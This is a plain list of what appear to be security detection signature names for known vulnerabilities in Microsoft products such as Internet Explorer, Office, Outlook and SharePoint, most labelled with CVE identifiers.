Microsoft-Internet-Explorer-Information-Disclosure-CVE-2015-2413
Microsoft-Internet-Explorer-Initfromstring-Function-Out-Of-Bounds-Memory-Access
Microsoft-Internet-Explorer-insertRow-Remote-Code-Execution
Microsoft-Internet-Explorer-Invalid-Pointer-Reference
Microsoft-Internet-Explorer-Invalid-Pointer-Reference-CVE-2010-0806
Microsoft-Internet-Explorer-Isindex-Memory-Corruption
Microsoft-Internet-Explorer-JavaScript-Page-Update-Race-Condition
Microsoft-Internet-Explorer-Jointostring-Type-Confusion
Microsoft-Internet-Explorer-JS-Information-Disclosure-CVE-2011-1245
Microsoft-Internet-Explorer-Jscript.dll-Regular-Expression-Use-After-Free
Microsoft-Internet-Explorer-Jscript9.dll-Typedarray-Use-After-Free
Microsoft-Internet-Explorer-Jserrortostring-Heap-Buffer-Overflow
Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption
Microsoft-Internet-Explorer-Layout-Use-After-Free
Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094
Microsoft-Internet-Explorer-Link-Properties-Handling-CVE-2011-1250
Microsoft-Internet-Explorer-Location-Property-Cross-Domain-Scripting
Microsoft-Internet-Explorer-Long-Url-Buffer-Overflow
Microsoft-Internet-Explorer-Loop-Counter-Memory-Corruption
Microsoft-Internet-Explorer-Malformed-BMP-File-Buffer-Overrun-Vulnerability
Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2009-1917
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3123
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3124
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3125
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3139
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5048
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5049
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5051
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5052
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1762
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1766
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1785
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1789
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1791
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1795
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1800
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1802
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1804
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2820
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2823
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2824
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4050
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4126
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4127
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4130
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4140
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-8967
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0018
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0036
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0046
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-1634
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2401
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2404
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2406
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2408
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2422
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2425
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2492
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6083
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6088
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6160
Microsoft-Internet-Explorer-Memory-Corruption-CVE-2016-0108
Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4080
Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4081
Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4086
Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4088
Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4089
Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4092
Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4094
Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4095
Microsoft-Internet-Explorer-Mismatched-DOM-Objects-Memory-Corruption
Microsoft-Internet-Explorer-Mouse-Movement-Information-Disclosure
Microsoft-Internet-Explorer-msxml3-Concurrency-Vulnerability
Microsoft-Internet-Explorer-Multiple-Event-Handler-Memory-Corruption
Microsoft-Internet-Explorer-Multiple-Events-Use-After-Free
Microsoft-Internet-Explorer-Null-Byte-CVE-2012-0012
Microsoft-Internet-Explorer-Null-Byte-CVE-2012-1873
Microsoft-Internet-Explorer-Null-Byte-Information-Disclosure
Microsoft-Internet-Explorer-Object-Management-CVE-2011-1345
Microsoft-Internet-Explorer-Object-Reference-Counting-Memory-Corruption
Microsoft-Internet-Explorer-Object-Tag-Popup
Microsoft-Internet-Explorer-Objects-Handling-Memory-Corruption
Microsoft-Internet-Explorer-OnMove-Use-After-Free-CVE-2012-1529
Microsoft-Internet-Explorer-Onpropertychange-Use-After-Free
Microsoft-Internet-Explorer-onreadystatechange-CVE-2012-0170
Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free
Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free-CVE-2010-0491
Microsoft-Internet-Explorer-Option-Element-Use-After-Free
Microsoft-Internet-Explorer-Out-Of-Bounds-Vulnerability-CVE-2018-0996
Microsoft-Internet-Explorer-outerHTML-Information-Disclosure
Microsoft-Internet-Explorer-Plugin-Loading-Address-Bar-Spoofing
Microsoft-Internet-Explorer-Popup-Title-Bar-Spoofing
Microsoft-Internet-Explorer-Print-Preview-Handling-Command-Execution
Microsoft-Internet-Explorer-Propertydesc-Double-Free
Microsoft-Internet-Explorer-Race-Condition-CVE-2011-1257
Microsoft-Internet-Explorer-Redirect-Memory-Corruption
Microsoft-Internet-Explorer-Remote-Code-Execution-CVE-2009-3762
Microsoft-Internet-Explorer-Runtimestyle-Handling-Memory-Corruption
Microsoft-Internet-Explorer-Same-Id-Property-Use-After-Free
Microsoft-Internet-Explorer-Same-Origin-Policy-Bypass
Microsoft-Internet-Explorer-Script-Engine-Stack-Exhaustion
Microsoft-Internet-Explorer-Scripting-Engine-Vulnerability-CVE-2018-0866
Microsoft-Internet-Explorer-Scrollintoview-Use-After-Free
Microsoft-Internet-Explorer-Select-Element-Memory-Corruption
Microsoft-Internet-Explorer-SelectAll-CVE-2012-0171
Microsoft-Internet-Explorer-Selection.empty-Use-After-Free
Microsoft-Internet-Explorer-Shell.Application-Object-Vulnerability-v1.0
Microsoft-Internet-Explorer-Speech-Control-Memory-Corruption
Microsoft-Internet-Explorer-Status-Bar-Url-Spoofing
Microsoft-Internet-Explorer-Style-Object-Memory-Corruption
Microsoft-Internet-Explorer-Style-Object-Memory-Corruption-CVE-2011-1964
Microsoft-Internet-Explorer-SVG-Marker-Object-Use-After-Free
Microsoft-Internet-Explorer-SVG-Memory-Corruption-CVE-2015-6134
Microsoft-Internet-Explorer-Table-Layout-Memory-Corruption
Microsoft-Internet-Explorer-Tabular-Data-Control-Memory-Corruption
Microsoft-Internet-Explorer-Telnet-Handler-Code-Execution-CVE-2011-1257
Microsoft-Internet-Explorer-Textrange-Memory-Corruption-CVE-2015-6154
Microsoft-Internet-Explorer-Textrange-Object-Memory-Corruption
Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255
Microsoft-Internet-Explorer-Time-Element-Memory-Corruption
Microsoft-Internet-Explorer-Title-Element-Use-After-Free
Microsoft-Internet-Explorer-toJSON-Use-After-Free
Microsoft-Internet-Explorer-toStaticHTML-Cross-Site-Scripting
Microsoft-Internet-Explorer-toStaticHTML-Disclosure-CVE-2011-1252
Microsoft-Internet-Explorer-TSUserEX.DLL-ActiveX-Control-Vulnerability
Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8114
Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8122
Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8279
Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8283
Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8291
Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8298
Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption
Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2009-2530
Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2009-2531
Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-0244
Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-0267
Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3328
Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3329
Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3331
Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2011-0036
Microsoft-Internet-Explorer-Uninitialized-Object-Memory-Corruption
Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass
Microsoft-Internet-Explorer-Url-Validation
Microsoft-Internet-Explorer-US-Ascii-Most-Significant-Bit-Obfuscation
Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962
Microsoft-Internet-Explorer-Use-After-Free-CVE-2012-0170
Microsoft-Internet-Explorer-Use-After-Free-CVE-2014-1776
Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0955
Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0990
Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0991
Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0994
Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1004
Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1018
Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-8275
Microsoft-Internet-Explorer-VBScript-Memory-Corruption
Microsoft-Internet-Explorer-Vector-Markup-Language-Vgx-Buffer-Overflow
Microsoft-Internet-Explorer-Virtual-Function-Table-Memory-Corruption
Microsoft-Internet-Explorer-VML-Buffer-Overrun
Microsoft-Internet-Explorer-VML-Memory-Corruption-CVE-2011-1266
Microsoft-Internet-Explorer-VML-Style-CVE-2012-0172
Microsoft-Internet-Explorer-VML-Use-After-Free
Microsoft-Internet-Explorer-WebBrowser-ActiveX-Control-Navigate-Method
Microsoft-Internet-Explorer-XMLDOM-Information-Disclosure
Microsoft-Internet-Explorer-XSLT-Memory-Corruption
Microsoft-Java-VM-Bytecode-Verifier-Bypass
Microsoft-Jet-Database-Engine-Excel-Component-Buffer-Overflow
Microsoft-Jet-Database-Engine-Excel-Component-Heap-Buffer-Overflow
Microsoft-Jet-Database-Engine-Heap-Based-Buffer-Overflow
Microsoft-Jet-Db-Engine-Buffer-Overflow
Microsoft-JScript-Scripting-Engine-Remote-Code-Execution
Microsoft-Killbit-Disabled-ActiveX-Object
Microsoft-Killbit-Disables-ActiveX-Object-CVE-2009-2493
Microsoft-Killbit-Disables-ActiveX-Object-CVE-2013-3918
Microsoft-License-Logging-Server-RPC-Call-Buffer-Overflow
Microsoft-Lync-Information-Disclosure-CVE-2014-1923
Microsoft-Lync-Insecure-Library-Loading-CVE-2012-1849
Microsoft-Malformed-AVI-Header-Vulnerability-MS09-038
Microsoft-Malware-Protection-Engine-File-Processing-Denial-Of-Service
Microsoft-Malware-Protection-Engine-Rar-Vmsf_RGB-Memory-Corruption
Microsoft-Media-Center-CVE-2016-0185
Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879
Microsoft-Media-Foundation-Cmp4metadatahandler-Addqtmetadata-Use-After-Free
Microsoft-Media-Foundation-Getkeyforindex-Out-Of-Bounds-Read
Microsoft-Media-Player-Audio-Sampling-Rate-Memory-Corruption
Microsoft-Message-Queuing-Remote-Code-Execution-CVE-2024-30080
Microsoft-Message-Queuing-Remote-Code-Execution-CVE-2024-49122
Microsoft-Message-Queuing-Remote-Code-Execution-Vulnerability-CVE-2023-21554
Microsoft-Message-Queuing-Service-Queue-Name-Handling-Memory-Corruption
Microsoft-Mime-Formatted-Request-Vulnerability-CVE-2011-1894
Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution
Microsoft-MSHTML-Platform-CVE-2021-33742-Remote-Code-Execution
Microsoft-MsMpEng-RCE-CVE-2017-0290
Microsoft-MsMpEng-Remote-Code-Execution-Vulnerability-CVE-2018-0986
Microsoft-Multiple-Products-HTML-Sanitization-Cross-Site-Scripting
Microsoft-Multiple-Products-TrueType-Font-Parsing-Memory-Corruption
Microsoft-Negotiate-SSP-Buffer-Overflow
Microsoft-Net-Framework-Mscoreei.dll-Insecure-Library-Loading
Microsoft-Net-Framework-Remote-Code-Execution
Microsoft-Net-Framework-Sharepoint-And-Visual-Studio-Remote-Code-Execution
Microsoft-Netlogon-RPC-Null-Deference-Denial-Of-Service-CVE-2010-2742
Microsoft-Network-Policy-Server-Radius-Denial-Of-Service
Microsoft-Network-Policy-Server-Radius-Denial-Of-Service-CVE-2016-0050
Microsoft-Ntlm-Authentication-After-HTTP-Redirect
Microsoft-Object-Packager-Insecure-Executable-Launching-Vulnerability
Microsoft-OData-Protocol-Replace-Denial-Of-Service-Vulnerability
Microsoft-Office-Access-ActiveX-Control-Memory-Corruption-CVE-2010-0814
Microsoft-Office-Art-Drawing-Records-CVE-2010-3334
Microsoft-Office-Art-Property-Table-Memory-Corruption
Microsoft-Office-ASLR-Bypass-CVE-2015-2375
Microsoft-Office-Bad-Index-Memory-Corruption
Microsoft-Office-Buffer-Overflow-CVE-2013-1331
Microsoft-Office-Cgm-Image-Converter-Buffer-Overflow
Microsoft-Office-Ctasksymbol-Use-After-Free
Microsoft-Office-CVE-2015-1649
Microsoft-Office-CVE-2015-1650
Microsoft-Office-CVE-2015-1682-Remote-Code-Execution
Microsoft-Office-CVE-2016-0021
Microsoft-Office-CVE-2016-3234-Information-Disclosure
Microsoft-Office-CVE-2016-3284-Memory-Corruption
Microsoft-Office-CVE-2016-3317
Microsoft-Office-CVE-2016-3318-Remote-Code-Execution
Microsoft-Office-CVE-2016-7264-Out-Of-Bounds-Read
Microsoft-Office-CVE-2016-7289-Memory-Corruption
Microsoft-Office-CVE-2017-0014
Microsoft-Office-CVE-2019-0560-Information-Disclosure
Microsoft-Office-Drawing-Exception-Handling-CVE-2010-3335
Microsoft-Office-Drawing-Record-Msofbtopt-Code-Execution
Microsoft-Office-Drawing-Shapes-Handling-Memory-Corruption
Microsoft-Office-Eps-CVE-2017-0262-Type-Confusion
Microsoft-Office-Eqnedt32-CVE-2018-0802-Matrix-Stack-Buffer-Overflow
Microsoft-Office-Eqnedt32-Stack-Buffer-Overflow
Microsoft-Office-Equation-Editor-Memory-Corruption
Microsoft-Office-Excel-ADO-Object-Parsing-Code-Execution
Microsoft-Office-Excel-Binary-Format-Parsing-Integer-Overflow
Microsoft-Office-Excel-CVE-2019-1110-Information-Disclosure
Microsoft-Office-Excel-Fcommithtmlpivotcacheelement-Use-After-Free
Microsoft-Office-Excel-File-Obj-Record-Memory-Corruption
Microsoft-Office-Excel-Formula-Record-Code-Execution
Microsoft-Office-Excel-Freephisxdb-Arbitrary-Free-CVE-2023-32029
Microsoft-Office-Excel-Hfpicture-Record-Buffer-Overflow
Microsoft-Office-Excel-Malformed-LBL-Record-Memory-Corruption
Microsoft-Office-Excel-Malformed-Object-Record-Parsing-Code-Execution
Microsoft-Office-Excel-Malformed-Record-Memory-Corruption
Microsoft-Office-Excel-Malformed-Records-Stack-Buffer-Overflow
Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562
Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822
Microsoft-Office-Excel-Object-Record-Corruption
Microsoft-Office-Excel-Ptgextraarray-Structure-Parsing-Memory-Corruption
Microsoft-Office-Excel-Publisher-Record-Memory-Corruption
Microsoft-Office-Excel-Realtimedata-Record-Parsing-Memory-Corruption
Microsoft-Office-Excel-Record-Pointer-Overwrite-Code-Execution
Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129
Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134
Microsoft-Office-Excel-RTD-Buffer-Overflow
Microsoft-Office-Excel-Sheet-Object-Type-Confusion
Microsoft-Office-Excel-String-Variable-Code-Execution
Microsoft-Office-Excel-Sxdb-Memory-Corruption
Microsoft-Office-Excel-SxView-Memory-Corruption
Microsoft-Office-Excel-SxView-SXStreamID-Memory-Corruption-CVE-2010-1245
Microsoft-Office-Excel-Table-Record-Parsing-Code-Execution
Microsoft-Office-Excel-Unexpected-Field-Value-Handling-Memory-Corruption
Microsoft-Office-Excel-Webcharts-Out-Of-Bounds-Write
Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824
Microsoft-Office-Excel-WorksheetOptions-Use-After-Free
Microsoft-Office-Excel-Xlsx-File-Parsing-Code-Execution
Microsoft-Office-File-Modification-Password-Use-After-Free
Microsoft-Office-FlashPix-Converter-Buffer-Overflow-CVE-2010-3951
Microsoft-Office-Gdiplus-EMF-File-Handling-Infinite-Loop
Microsoft-Office-Groove-Insecure-Library-Loading
Microsoft-Office-Image-Filter-Crafted-BMP-Header-Buffer-Overflow
Microsoft-Office-Information-Disclosure-Vulnerability-CVE-2016-3234
Microsoft-Office-Insecure-Library-Loading
Microsoft-Office-Insecure-Library-Loading-CVE-2010-3337
Microsoft-Office-Jet-Engine-MDB-File-Parsing-Buffer-Overflow
Microsoft-Office-Malformed-Routing-Slip-Code-Execution
Microsoft-Office-Malicious-OLE-File
Microsoft-Office-Memory-Corruption-CVE-2015-0086
Microsoft-Office-Memory-Corruption-CVE-2016-0022
Microsoft-Office-Memory-Corruption-CVE-2016-0052
Microsoft-Office-Memory-Corruption-CVE-2016-0053
Microsoft-Office-Memory-Corruption-CVE-2016-3280
Microsoft-Office-Memory-Corruption-Vulnerability-CVE-2015-2558
Microsoft-Office-MSO-Buffer-Overflow
Microsoft-Office-MSO-Large-SPID-Read-AV-CVE-2010-3336
Microsoft-Office-Oleobject-Type-Confusion
Microsoft-Office-OneNote-Url-Validation-Error-Vulnerability
Microsoft-Office-Outlook-CVE-2018-8161-Use-After-Free
Microsoft-Office-Outlook-Mailto-URI-Handling-Code-Execution
Microsoft-Office-Pict-Filter-Invalid-Length-Memory-Corruption
Microsoft-Office-Pict-Filter-Map-Structure-Memory-Corruption
Microsoft-Office-Pict-Image-Converter-Integer-Overflow
Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573
Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572
Microsoft-Office-PowerPoint-Invalid-Object-Reference-Code-Execution
Microsoft-Office-PowerPoint-MS09-017
Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0029
Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031
Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032
Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033
Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034
Microsoft-Office-Publisher-Invalid-Memory-Reference
Microsoft-Office-Remote-Code-Execution-CVE-2016-0012
Microsoft-Office-Remote-Code-Execution-CVE-2024-38021
Microsoft-Office-Remote-Code-Execution-CVE-2025-21365
Microsoft-Office-RTF-Stack-Overflow-CVE-2010-3333
Microsoft-Office-Security-Feature-Bypass-CVE-2023-36413
Microsoft-Office-SharePoint-Server-Cross-Site-Scripting
Microsoft-Office-Sharepoint-Server-help.aspx-Cross-Site-Scripting
Microsoft-Office-Spoofing-Vulnerability-CVE-2024-38200
Microsoft-Office-Spoofing-Vulnerability-CVE-2024-43609
Microsoft-Office-Suspicious-Ddeauto-Command
Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution
Microsoft-Office-TIFF-Converter-Heap-Overflow-CVE-2010-3947
Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770
Microsoft-Office-Visio-Data-Type-Memory-Corruption
Microsoft-Office-Web-Components-2-MS09-043
Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136
Microsoft-Office-Web-Components-MS09-043
Microsoft-Office-Web-Components-Url-Parsing-Buffer-Overflow
Microsoft-Office-Word-And-Web-Apps-Memory-Corruption
Microsoft-Office-Word-CVE-2014-6333-Use-After-Free
Microsoft-Office-Word-CVE-2019-0540-Security-Feature-Bypass
Microsoft-Office-Word-CVE-2019-0561-Information-Disclosure
Microsoft-Office-Word-File-Fib-Processing-Memory-Corruption
Microsoft-Office-Word-HTML-Linked-Objects-Memory-Corruption
Microsoft-Office-Word-Sprmcmajority-Record-Buffer-Overflow
Microsoft-Office-Word-Sprmtdiagline80-Record-Parsing-Stack-Buffer-Overflow
Microsoft-Office-Word-Stsh-Record-Parsing-Memory-Corruption
Microsoft-Office-Word-Wordperfect-Converter-Buffer-Overflow
Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658
Microsoft-OLE-Property-Vulnerability
Microsoft-OLE-Structured-Storage-File-Transfer
Microsoft-OLE-UtOlePresStmToContentsStm-Use-After-Free-CVE-2025-21298
Microsoft-OMI-Management-Interface-Authentication-Bypass
Microsoft-OpenType-Font-Handling-Memory-Corruption
Microsoft-OpenType-Font-Index-Remote-Code-Execution
Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397
Microsoft-Outlook-Express-And-Windows-Mail-Integer-Overflow
Microsoft-Outlook-Express-And-Windows-Mail-MHTML-URL-Parsing-Vulnerability
Microsoft-Outlook-Express-MHTML-Url-Processing-Vulnerability
Microsoft-Outlook-iCal-Meeting-Request-Vevent-Record-Memory-Corruption
Microsoft-Outlook-Object-Security-Bypass-Vulnerability
Microsoft-Outlook-Out-Of-Bounds-Vulnerability-CVE-2018-8587
Microsoft-Outlook-Outlmime.dll-Content-Type-Denial-Of-Service
Microsoft-Outlook-OWA-URL-Redirection-CVE-2014-6336
Microsoft-Outlook-RCE-CVE-2015-6123
Microsoft-Outlook-Remote-Code-Execution-Monikerlink-CVE-2024-21413
Microsoft-Outlook-Rwz-Integer-Overflow
Microsoft-Outlook-Security-Feature-Bypass-Vulnerability-CVE-2017-11774
Microsoft-Outlook-Smb-Attach_By_Reference-Code-Execution
Microsoft-Outlook-Web-Access-Cross-Site-Scripting-Vulnerability
Microsoft-Outlook-Web-Access-HTML-Validating-Cross-Site-Scripting
Microsoft-Outlook-Word-Object-Tag
Microsoft-OWA-XSS-Vulnerability-CVE-2015-1628
Microsoft-Paint-JPEG-Image-Parsing-Integer-Overflow
Microsoft-PEAP-Heap-Overflow-Vulnerability-CVE-2023-21689
Microsoft-PEAP-Heap-Overflow-Vulnerability-CVE-2023-21690
Microsoft-PowerPoint-2003-Heap-Overflow
Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131
Microsoft-PowerPoint-Fp-Technocolor-TimeBandit-Vulnerability
Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130
Microsoft-PowerPoint-Insecure-Library-Loading-CVE-2011-3396
Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221
Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0224
Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225
Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556
Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128
Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129
Microsoft-PowerPoint-OfficeArt-Atom-RCE-Vulnerability
Microsoft-PowerPoint-OfficeArt-Shape-RCE-Vulnerability
Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution
Microsoft-PowerPoint-PPT-File-Parsing-Memory-Corruption
Microsoft-PowerPoint-Presentation-Buffer-Overrun-CVE-2011-1269
Microsoft-PowerPoint-Presentation-Memory-Corruption-CVE-2011-1269
Microsoft-PowerPoint-Txmasterstyle10atom-Processing-Code-Execution
Microsoft-PowerPoint-Viewer-Drawing-Shape-Integer-Overflow
Microsoft-PowerShell-Remoting-Tabexpansion-Sandbox-Bypass
Microsoft-Print-Service-Impersonation-CVE-2010-2729
Microsoft-Print-Spooler-Service-RpcGetPrinterData-Function-DoS
Microsoft-Products-Uniscribe-Font-Parsing-Engine-Memory-Corruption
Microsoft-Publisher-Array-Indexing-Memory-Corruption-CVE-2010-3955
Microsoft-Publisher-File-Conversion-Textbox-Processing-Buffer-Overflow
Microsoft-Publisher-Invalid-Pointer-CVE-2011-3411
Microsoft-Publisher-Memory-Corruption-CVE-2011-3412
Microsoft-Publisher-Out-Of-Bounds-Array-Index-CVE-2011-3410
Microsoft-Publisher-Pubconv.dll-Function-Pointer-Overwrite
Microsoft-Publisher-Security-Features-Bypass-CVE-2024-38226
Microsoft-Publisher-Size-Value-Heap-Corruption-CVE-2010-2569
Microsoft-Remote-Administration-Protocol-Heap-Overflow-Vulnerability
Microsoft-Remote-Administration-Protocol-Stack-Overflow-Vulnerability
Microsoft-Remote-Desktop-Connection-Manager-Xml-External-Entity-Injection
Microsoft-Remote-Desktop-Insecure-Library-Loading-CVE-2011-0029
Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044
Microsoft-Remote-Desktop-Web-Access-Cross-Site-Scripting
Microsoft-Report-Viewer-Control-Cross-Site-Scripting
Microsoft-Report-Viewer-XSS-Vulnerability-CVE-2011-1976
Microsoft-Rich-Textbox-Control-Savefile-Insecure-Method-Arbitrary-File-Overwrite
Microsoft-Schannel-CVE-2010-3229
Microsoft-Scripting-Engine-CVE-2016-0189-Memory-Corruption
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0834
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0835
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0837
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0838
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0840
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0858
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0860
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8229
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8266
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8353
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8355
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8371
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8372
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8384
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8387
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8389
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8403
Microsoft-Scripting-Engine-Memory-Corruption-CVE-2024-38178
Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1001
Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1004
Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1062
Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1063
Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1092
Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1103
Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1104
Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1106
Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1107
Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2020-17052
Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2021-34480
Microsoft-Scripting-Runtime-Object-Library-Use-After-Free-Vulnerability
Microsoft-Sharepoint-Accessserviceslisteventreceiver-Insecure-Deserialization
Microsoft-Sharepoint-Authentication-Bypass-CVE-2023-29357
Microsoft-Sharepoint-Basexmldatasource-XML-External-Entity-Injection
Microsoft-Sharepoint-Calendar-Cross-Site-Scripting
Microsoft-Sharepoint-Cross-Site-Scripting-Vulnerability-CVE-2015-1640
Microsoft-SharePoint-CVE-2019-1443-Information-Disclosure
Microsoft-Sharepoint-Denial-Of-Service-Vulnerability
Microsoft-SharePoint-Directory-Traversal-Vulnerability
Microsoft-Sharepoint-Editform-Script-Injection-Vulnerability
Microsoft-Sharepoint-Malformed-Request-Code-Execution-CVE-2010-3964
Microsoft-SharePoint-Reflected-List-Parameter-CVE-2012-1863
Microsoft-SharePoint-Remote-Code-Execution
Microsoft-SharePoint-Remote-Code-Execution-CVE-2020-17061
Microsoft-Sharepoint-Remote-Code-Execution-CVE-2025-29793
Microsoft-Sharepoint-Remote-Code-Execution-Vulnerability-CVE-2023-33157
